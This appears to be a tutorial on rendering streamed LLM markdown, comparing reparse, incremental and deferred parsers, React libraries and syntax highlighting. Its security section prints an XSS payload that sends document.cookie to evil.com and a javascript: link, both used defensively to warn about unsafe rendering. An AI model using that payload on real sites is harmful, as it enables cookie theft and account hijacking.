
Markdown Streaming and Incremental Parsing

Advanced · 18 min read

The Markdown That Arrives One Token at a Time

Here is something that bites every developer building an AI chat interface: LLMs do not send you a finished response. They stream it. Token by token. And those tokens form markdown — headings, bold text, code blocks, tables, links — that is structurally incomplete until the very last token arrives.

Try rendering "**this is bol" as markdown. That is not bold text. That is a broken paragraph with two literal asterisks. Now imagine this happening 30 times per second as tokens arrive. The result? A janky, flickering mess that makes users think your app is broken.

This is the fundamental problem of markdown streaming, and solving it well is what separates a polished AI product from a prototype.

Mental Model

Think of streaming markdown like receiving a jigsaw puzzle one piece at a time through a mail slot. A traditional markdown parser is like someone who dumps all the pieces on a table and assembles them at once — they need the complete picture. An incremental parser is like someone standing at the mail slot, fitting each piece into the growing picture the moment it arrives. They never need to see all pieces at once, and they never tear apart work they have already done.

Flash of Incomplete Markdown (FOIM)

You have heard of FOUC (Flash of Unstyled Content). Meet its cousin: FOIM — Flash of Incomplete Markdown. It is the visual glitch users see when you naively render a partial markdown stream.

Here is what FOIM looks like in practice:

Token stream:          What the user sees:
─────────────         ─────────────────────
"Here is a "          Here is a
"**bold"              Here is a **bold
"** word"             Here is a bold word       ← fixed, but flickered
"and a `code"         Here is a bold word and a `code
"` block"             Here is a bold word and a code block

Every time a structural markdown token arrives incomplete — an unclosed **, a dangling backtick, an opening [ without a ] — the parser either renders it as literal characters or produces broken HTML. Then when the closing token arrives, everything jumps into the correct format. The user sees a constant stutter between "broken" and "fixed."
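This broken state is easy to detect mechanically. As a toy illustration (a hypothetical helper, not from any library — real parsers track far more, such as escapes and nesting), counting unmatched delimiters tells you whether the buffer currently ends mid-element:

```typescript
// Toy check: does the buffer contain an unmatched ** or ` delimiter?
// A real streaming parser tracks this with a state machine, not regexes.
function hasUnclosedDelimiters(text: string): boolean {
  const strongCount = (text.match(/\*\*/g) ?? []).length;
  const backtickCount = (text.match(/`/g) ?? []).length;
  return strongCount % 2 === 1 || backtickCount % 2 === 1;
}
```

Every intermediate render where this returns true is a frame of FOIM.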

The worst offender? Code blocks. A fenced code block with triple backticks needs both an opening and closing fence. During streaming, you might have dozens of lines of code rendered as a plain paragraph because the closing fence has not arrived yet.

Quiz
What causes the Flash of Incomplete Markdown problem?

Three Approaches to the Problem

There are three fundamentally different strategies for rendering streamed markdown. Each makes a different tradeoff between complexity, performance, and visual quality.

| Approach | How it works | Cost per token | FOIM? | Complexity |
| --- | --- | --- | --- | --- |
| Full reparse | Reparse the entire accumulated string on every token | O(n), where n is total length | No — always a complete parse | Low — just call your parser again |
| Incremental parsing | Parse only the new chunk, append to the existing AST/DOM | O(k), where k is chunk size | No — the parser tracks open delimiters | High — needs a streaming-aware parser |
| Deferred rendering | Buffer tokens, render only when a structural unit is complete | O(1) amortized | No — but introduces latency | Medium — needs delimiter detection |

Full Reparse: The Brute Force Approach

This is what most developers reach for first. On every new token, concatenate it to a buffer string, then pass the entire string through a markdown parser like remark or marked.

let buffer = '';

function onToken(token: string) {
  buffer += token;
  const html = marked.parse(buffer);
  container.innerHTML = html;
}

It works. No FOIM, because the parser handles incomplete markdown gracefully (most parsers treat unclosed delimiters as literal text). But the cost is brutal.

After 1,000 tokens, every new token reparses all 1,000 tokens. After 5,000 tokens, every token reparses 5,000. This is O(n) per token, which means O(n squared) total for the entire response. For a long response with code blocks and tables, you will notice visible lag around 2,000-3,000 tokens.
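The arithmetic is easy to verify with a sketch (assuming, for simplicity, that every token is the same size):

```typescript
// Total characters parsed by the full-reparse strategy: every new token
// triggers a reparse of the entire accumulated buffer.
function fullReparseCost(tokens: number, charsPerToken: number): number {
  let total = 0;
  let bufferLength = 0;
  for (let i = 0; i < tokens; i++) {
    bufferLength += charsPerToken; // buffer grows by one token
    total += bufferLength;         // ...and the whole buffer is reparsed
  }
  return total;
}
```

For 3,000 tokens of 4 characters each, this comes to roughly 18 million characters parsed in total, versus 12,000 for a parser that touches each character once.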

And it gets worse: if you are rendering with React, every reparse produces a completely new DOM tree, which means React diffs the entire output on every single token. Layout thrashing, GC pressure, dropped frames.

Incremental Parsing: Parse Once, Append Forever

This is the correct solution for production. An incremental parser maintains internal state — it knows which delimiters are currently open, what block context it is in (paragraph, code block, list), and where the rendered output ends. When a new chunk arrives, it only parses that chunk in the context of the current state.

import * as smd from 'streaming-markdown';

const parser = smd.parser(smd.default_renderer(container));

function onToken(token: string) {
  smd.parser_write(parser, token);
}

The cost per token is O(k) where k is the size of the chunk — typically a few characters. Total cost for the entire response: O(n). That is a massive difference from the full-reparse O(n squared).

The streaming-markdown library takes this approach. It maintains a state machine that tracks open delimiters, and it directly manipulates the DOM — appending new elements or text nodes as tokens arrive, never touching previously rendered content.

Deferred Rendering: Wait for Completeness

A middle-ground approach: buffer tokens until you can detect that a structural unit is complete, then render that unit. For example, wait until you see a complete paragraph (double newline), a complete code block (both fences), or a complete inline element (matching delimiters).

let buffer = '';
let rendered = '';

function onToken(token: string) {
  buffer += token;
  const completeParts = extractCompleteParts(buffer);
  if (completeParts) {
    rendered += marked.parse(completeParts);
    buffer = buffer.slice(completeParts.length);
    container.innerHTML = rendered;
  }
}

This avoids FOIM and keeps reparse cost low, but introduces visible latency. Users see nothing while a code block is streaming (which could be many seconds), then the entire block appears at once. That is arguably worse than FOIM for perceived performance.
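The extractCompleteParts helper above is left undefined; here is one possible sketch (an assumption, not a standard function): return the prefix of the buffer up to the last blank line, while treating blank lines inside an open code fence as not yet complete. The FENCE constant is built dynamically to avoid embedding a literal fence marker:

```typescript
const FENCE = '`'.repeat(3); // three backticks, built dynamically

// Returns the longest prefix of `buffer` that ends at a completed paragraph
// boundary (blank line), never cutting inside a fenced code block.
function extractCompleteParts(buffer: string): string {
  let cut = -1;        // index just past the last completed paragraph
  let inFence = false;
  let offset = 0;
  for (const line of buffer.split('\n')) {
    if (line.trim().startsWith(FENCE)) inFence = !inFence;
    offset += line.length + 1; // +1 for the newline
    if (!inFence && line.trim() === '') cut = offset;
  }
  return cut === -1 ? '' : buffer.slice(0, cut);
}
```

An empty return means nothing is complete yet — which is exactly the latency problem this approach suffers from.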

Quiz
A streaming LLM response contains 4,000 tokens. With the full-reparse approach, approximately how many total tokens does the parser process across all updates?

How Incremental Parsers Work

The key insight behind incremental markdown parsing: markdown is a state machine. At any point during a stream, the parser is in one of several states — paragraph, heading, code block, emphasis, strong emphasis, link text, and so on. Each new character either transitions the state or produces output.

The State Machine

Here is a simplified version of the states an incremental markdown parser tracks:

type ParserState =
  | 'paragraph'
  | 'heading'
  | 'code_block'
  | 'code_inline'
  | 'emphasis'
  | 'strong'
  | 'link_text'
  | 'link_url'
  | 'list_item'
  | 'table';

interface StreamParser {
  state: ParserState;
  openDelimiters: string[];
  currentElement: HTMLElement;
  buffer: string;
}

When the parser receives **, it transitions from paragraph to strong, opens a <strong> element, and pushes ** onto the open delimiter stack. When it receives the closing **, it closes the element and pops the delimiter. If the stream ends without a closing delimiter, the parser can handle it gracefully — either leaving the element open (it will be closed when more tokens arrive) or treating the delimiter as literal text.

This is fundamentally different from a batch parser like remark, which builds an entire AST from a complete string. Batch parsers have no concept of "more input coming later."
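The open-delimiter stack described above can be sketched in a few lines (a deliberate simplification — real parsers also handle mismatched, escaped, and literal delimiters):

```typescript
type Delimiter = '**' | '`';

// Minimal open-delimiter stack: push on open, pop on matching close.
class DelimiterTracker {
  private stack: Delimiter[] = [];

  feed(delim: Delimiter): void {
    if (this.stack[this.stack.length - 1] === delim) {
      this.stack.pop();       // closing delimiter: close the element
    } else {
      this.stack.push(delim); // opening delimiter: open a new element
    }
  }

  openCount(): number {
    return this.stack.length; // > 0 means the stream currently ends mid-element
  }
}
```

When the stream pauses with openCount() > 0, the renderer simply leaves those elements open; the next chunk either closes them or nests deeper.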

The streaming-markdown Library

The streaming-markdown library implements exactly this pattern. It creates a parser instance bound to a container element, and you feed it chunks as they arrive:

import * as smd from 'streaming-markdown';

const container = document.getElementById('output')!;
const parser = smd.parser(smd.default_renderer(container));

const response = await fetch('/api/chat', { method: 'POST', body: prompt });
const reader = response.body!.getReader();
const decoder = new TextDecoder();

while (true) {
  const { done, value } = await reader.read();
  if (done) break;
  smd.parser_write(parser, decoder.decode(value, { stream: true }));
}

smd.parser_end(parser);

Key characteristics:

  • Zero dependencies — pure JavaScript, no remark/unified overhead
  • Direct DOM manipulation — no virtual DOM diffing, no React reconciliation
  • Handles incomplete delimiters — the state machine tracks what is open
  • Tiny bundle — around 4KB minified
Why direct DOM manipulation beats virtual DOM here

When rendering streamed markdown with React, every token triggers a state update, which triggers reconciliation, which diffs the entire markdown output tree. Even with React 19's concurrent features, this creates unnecessary work, because the diff almost always resolves to "append one text node or element." Direct DOM manipulation — appendChild, or appending to a node's textContent — is O(1) per operation: no diffing, no fiber tree traversal, no commit phase. For streaming scenarios where you are appending 30+ times per second, this difference matters.

React Solutions

Direct DOM manipulation is fast, but most AI applications are built with React. You need solutions that work within React's rendering model.

react-markdown: Safe but Slow

react-markdown is the standard React component for rendering markdown. It is safe (no dangerouslySetInnerHTML), extensible (remark/rehype plugins), and battle-tested. But it was not designed for streaming.

function ChatMessage({ content }: { content: string }) {
  return <ReactMarkdown>{content}</ReactMarkdown>;
}

Every time content changes (on every token), react-markdown reparses the entire string with remark, builds a new AST, transforms it through any plugins, and renders a new React element tree. React then diffs the old and new trees. This is the full-reparse approach wrapped in React — O(n) per token.

For short responses (under ~1,000 tokens), this is fine. For longer responses with code blocks and tables, you will see frame drops.

streamdown: The Streaming-First Alternative

streamdown is a drop-in replacement for react-markdown designed specifically for streaming. It handles unterminated markdown blocks gracefully and uses an incremental parser internally:

import { Streamdown } from 'streamdown';

function ChatMessage({ content }: { content: string }) {
  return <Streamdown>{content}</Streamdown>;
}

Under the hood, streamdown tracks the previously rendered length. When content grows, it only parses the new portion and appends the result. This gives you O(k) per token within React's component model.

markdown-to-jsx: The optimizeForStreaming Option

markdown-to-jsx offers an optimizeForStreaming option that smooths the visual experience during streaming:

import Markdown from 'markdown-to-jsx';

function ChatMessage({ content }: { content: string }) {
  return (
    <Markdown options={{ optimizeForStreaming: true }}>
      {content}
    </Markdown>
  );
}

This flag detects incomplete markdown structures (unclosed bold, italic, links, code spans, HTML tags) and suppresses their rendering until the closing delimiter arrives. Without it, users see distracting flashes of raw markdown syntax between tokens. Note that this does not solve the O(n) reparse cost — markdown-to-jsx still reparses the full string on each update. It solves the visual glitch problem, not the performance problem.

Quiz
Why is react-markdown not optimized for streaming even though it produces correct output?

Code Block Handling: The Hardest Part

Code blocks are the single most challenging element to handle during streaming. Here is why:

  1. Fenced code blocks need both delimiters — until the closing triple backtick arrives, you do not know if you are inside a code block or looking at an inline code span
  2. Language detection — the language identifier comes right after the opening fence (```typescript). You need it for syntax highlighting, but it arrives before any code content
  3. Syntax highlighting is expensive — running Shiki or Prism on every token inside a code block adds significant cost
  4. Content must stay literal — text inside a code block should not be parsed as markdown (no bold, no links, no headings)
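The core of point 1 — "am I currently inside a fenced block?" — reduces to counting fence lines seen so far: an odd count means a fence is open. A sketch, assuming fences always start a line (and building the marker dynamically to avoid a literal fence):

```typescript
const FENCE = '`'.repeat(3); // three backticks

// True when the end of the buffer falls inside an open fenced code block.
function insideFence(buffer: string): boolean {
  const fenceLines = buffer
    .split('\n')
    .filter((line) => line.trim().startsWith(FENCE)).length;
  return fenceLines % 2 === 1; // odd count: the last fence is still open
}
```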

Detecting Incomplete Fences

An incremental parser tracks whether it is inside a code block with a simple state flag:

let inCodeBlock = false;
let lineBuffer = '';       // holds the current, possibly incomplete line
let codeBlockContent = '';
let codeBlockLang = '';

function processToken(token: string) {
  lineBuffer += token;
  const lines = lineBuffer.split('\n');
  lineBuffer = lines.pop()!; // keep the trailing partial line for the next token

  for (const line of lines) {
    const trimmed = line.trim();
    if (!inCodeBlock && trimmed.startsWith('```')) {
      inCodeBlock = true;
      codeBlockLang = trimmed.slice(3).trim();
    } else if (inCodeBlock && trimmed === '```') {
      inCodeBlock = false;
      highlightAndRender(codeBlockContent, codeBlockLang);
      codeBlockContent = '';
    } else if (inCodeBlock) {
      codeBlockContent += line + '\n';
    }
  }
}

Syntax Highlighting During Streaming

You have two options for syntax highlighting streamed code:

Option 1: Highlight on every token — Run the highlighter on the accumulated code block content each time a new token arrives. This gives instant, accurate highlighting but is expensive. Shiki parses the entire code block each time.

Option 2: Highlight on completion — Show raw code (with a monospace font and code-block styling) during streaming, then run the highlighter once when the closing fence arrives. This is cheaper but creates a visual flash when highlighting activates.

The best approach for production: use a debounced hybrid. Show raw code immediately, and schedule a highlight pass with requestIdleCallback or a debounce. If the next token arrives before the highlight runs, cancel and reschedule. This gives near-instant raw rendering with progressive highlighting that does not block the main thread.

let highlightTimer: number | null = null;

function onCodeToken(token: string) {
  appendRawCode(token);

  // Cancel any pending highlight pass and schedule a fresh one for idle time.
  // (Safari does not ship requestIdleCallback — fall back to setTimeout there.)
  if (highlightTimer !== null) cancelIdleCallback(highlightTimer);
  highlightTimer = requestIdleCallback(() => {
    highlightCurrentBlock();
  });
}
Common Trap

Never run syntax highlighting synchronously on every streaming token. Shiki and Prism both do significant work — tokenizing, applying themes, generating HTML. At 30+ tokens per second inside a code block, synchronous highlighting will absolutely drop frames. Always debounce or defer to requestIdleCallback.

Performance: The Numbers

Let us quantify the difference between full reparse and incremental parsing with concrete numbers.

Assume an LLM response of 3,000 tokens (a typical detailed answer), with an average token size of 4 characters (12,000 characters total).

Full reparse (react-markdown with remark):

  • Token 1: parse 4 chars
  • Token 100: parse 400 chars
  • Token 1,000: parse 4,000 chars
  • Token 3,000: parse 12,000 chars
  • Total characters parsed: ~18,000,000 (≈ total length × token count / 2)
  • At a parse rate of ~1M chars/sec for remark: ~18 seconds of CPU time spread across the stream
  • Plus React reconciliation on every token: another ~6 seconds
  • Result: visible jank after ~1,500 tokens

Incremental parsing (streaming-markdown):

  • Each token: parse ~4 chars, append to DOM
  • Total characters parsed: 12,000 (exactly n)
  • At ~1M chars/sec: ~12 milliseconds total
  • No React reconciliation (direct DOM)
  • Result: smooth at any response length

That is a ~1,500x reduction in parse work for a 3,000-token response. And the gap keeps widening — the total full-reparse work grows quadratically with length, so a 10,000-token response would take roughly 5,000x less work with incremental parsing.
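A sanity check on that ratio: full reparse processes 1 + 2 + … + T token-sized chunks, while an incremental parser processes each of the T chunks exactly once, so the ratio simplifies to (T + 1) / 2:

```typescript
// Ratio of total parse work, full reparse vs incremental, for T equal-sized tokens.
function reparseRatio(tokens: number): number {
  const fullReparse = (tokens * (tokens + 1)) / 2; // 1 + 2 + ... + T chunks
  const incremental = tokens;                      // each chunk parsed once
  return fullReparse / incremental;                // = (T + 1) / 2
}
```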

Execution Trace

| Token | Full reparse | Incremental | Observation |
| --- | --- | --- | --- |
| 1 | parse 4 chars | parse 4 chars | No measurable difference yet |
| 500 | parse 2,000 chars | parse 4 chars | 500x difference |
| 1,500 | parse 6,000 chars | parse 4 chars | First visible frame drops — users start noticing lag |
| 2,500 | parse 10,000 chars | parse 4 chars | Consistent jank for full reparse |
| 3,000 | parse 12,000 chars | ~12 ms total across the stream | ~1,500x less total work for incremental |
Quiz
A chat app uses react-markdown to render streamed responses. Users report that short responses feel snappy but long technical answers become laggy. What is the most likely cause?

Security: Why Rendering Matters

Markdown rendering in AI applications introduces a security surface that many developers overlook. The LLM output is user-influenced — prompt injection can cause the model to output arbitrary markdown, including links, images, and HTML.

The dangerouslySetInnerHTML Trap

Some markdown parsers output raw HTML strings, which you then inject into the DOM:

function UnsafeChatMessage({ content }: { content: string }) {
  const html = marked.parse(content);
  return <div dangerouslySetInnerHTML={{ __html: html }} />;
}

This is an XSS vector. If the LLM outputs markdown containing raw HTML (which many models do when asked), you are injecting that HTML directly into the page:

Check out this helpful link:
<img src="x" onerror="fetch('https://evil.com/steal?cookie='+document.cookie)">

marked.parse() with default settings will include that <img> tag in its output, and dangerouslySetInnerHTML will execute the onerror handler.

react-markdown Is Safe by Design

react-markdown does not use dangerouslySetInnerHTML. It builds a React element tree from the AST, which means raw HTML in the markdown source is rendered as literal text, not executed. This is why react-markdown remains popular despite its streaming performance issues — safety is built in.

What About Incremental Parsers?

streaming-markdown directly manipulates the DOM, so you need to verify that it does not inject raw HTML from the markdown source. The library creates elements via document.createElement and sets text via textContent (not innerHTML), which is safe against XSS.

However, any parser that outputs HTML strings and uses innerHTML is vulnerable. Always audit the rendering path.

Always sanitize if using innerHTML

If your rendering pipeline produces HTML strings, run them through DOMPurify before injection. Better yet, use a parser that creates DOM elements directly or builds React elements from an AST — neither approach is vulnerable to XSS from markdown content.

Even with safe rendering, LLM-generated links can be malicious. A model could output [click here](javascript:alert('xss')) or link to phishing sites. Always validate link URLs:

function isSafeUrl(url: string): boolean {
  try {
    const parsed = new URL(url);
    return ['http:', 'https:', 'mailto:'].includes(parsed.protocol);
  } catch {
    return false;
  }
}
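In practice, the check should gate every href before it reaches the DOM. A hypothetical wrapper (isSafeUrl is repeated here so the snippet stands alone) downgrades unsafe or malformed links to an inert href:

```typescript
// Allow only protocols that cannot execute script.
function isSafeUrl(url: string): boolean {
  try {
    const parsed = new URL(url);
    return ['http:', 'https:', 'mailto:'].includes(parsed.protocol);
  } catch {
    return false; // malformed URLs are unsafe by default
  }
}

// Hypothetical wrapper: unsafe or malformed URLs become an inert '#'.
function safeHref(url: string): string {
  return isSafeUrl(url) ? url : '#';
}
```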
| What developers do | Why it fails | What they should do |
| --- | --- | --- |
| Use dangerouslySetInnerHTML to render LLM markdown output | LLM output can contain injected HTML via prompt injection — dangerouslySetInnerHTML executes it as real HTML, enabling XSS | Use react-markdown, streamdown, or a parser that creates DOM elements directly |
| Reparse the entire accumulated string on every streaming token | Full reparse is O(n) per token, O(n squared) total — causes visible lag on responses over ~1,500 tokens | Use an incremental parser like streaming-markdown or streamdown |
| Run syntax highlighting synchronously on every code token | Syntax highlighters like Shiki do heavy tokenization work — running them 30+ times per second blocks the main thread | Debounce highlighting with requestIdleCallback, or render raw code and highlight on block completion |
| Assume LLM-generated markdown links are safe | Prompt injection can cause models to output malicious links | Validate link protocols and filter out javascript: and data: URLs |
| Use deferred rendering to avoid FOIM | Deferred rendering hides content until structures are complete — users see nothing during long code blocks, hurting perceived performance | Use incremental parsing that handles incomplete delimiters gracefully |

Putting It All Together

Here is a production-ready pattern for streaming markdown in a React application:

import { useRef, useEffect, useCallback } from 'react';
import * as smd from 'streaming-markdown';

function StreamingMessage({ streamUrl }: { streamUrl: string }) {
  const containerRef = useRef<HTMLDivElement>(null);
  const parserRef = useRef<ReturnType<typeof smd.parser> | null>(null);

  const startStream = useCallback(async () => {
    if (!containerRef.current) return;

    parserRef.current = smd.parser(smd.default_renderer(containerRef.current));

    const response = await fetch(streamUrl);
    const reader = response.body!.getReader();
    const decoder = new TextDecoder();

    try {
      while (true) {
        const { done, value } = await reader.read();
        if (done) break;
        smd.parser_write(parserRef.current, decoder.decode(value, { stream: true }));
      }
    } finally {
      if (parserRef.current) smd.parser_end(parserRef.current);
    }
  }, [streamUrl]);

  useEffect(() => {
    startStream();
  }, [startStream]);

  return <div ref={containerRef} className="prose" />;
}

This component:

  • Uses streaming-markdown for O(k)-per-token incremental parsing
  • Handles the ReadableStream from a fetch response directly
  • Cleans up the parser when the stream ends
  • Renders into a container div without React reconciliation overhead

For applications that need React-rendered markdown (custom components, plugin support), use streamdown instead — it gives you incremental parsing within React's component model.

Key Rules
  1. Never reparse the entire markdown string on every streaming token — it is O(n) per token, O(n squared) total.
  2. Use incremental parsers like streaming-markdown or streamdown that parse only new content in O(k) per token.
  3. Never use dangerouslySetInnerHTML to render LLM-generated markdown — it is an XSS vector via prompt injection.
  4. Debounce syntax highlighting during code block streaming — run the highlighter on idle, not on every token.
  5. Always validate URLs in LLM-generated links — filter out javascript: and data: protocol URLs.
  6. For React apps needing plugin support, use streamdown as a drop-in react-markdown replacement with streaming optimization.
Quiz
You are building a production AI chat app. The requirements are: streaming markdown rendering, custom React components in markdown, remark plugin support, and XSS safety. Which approach should you use?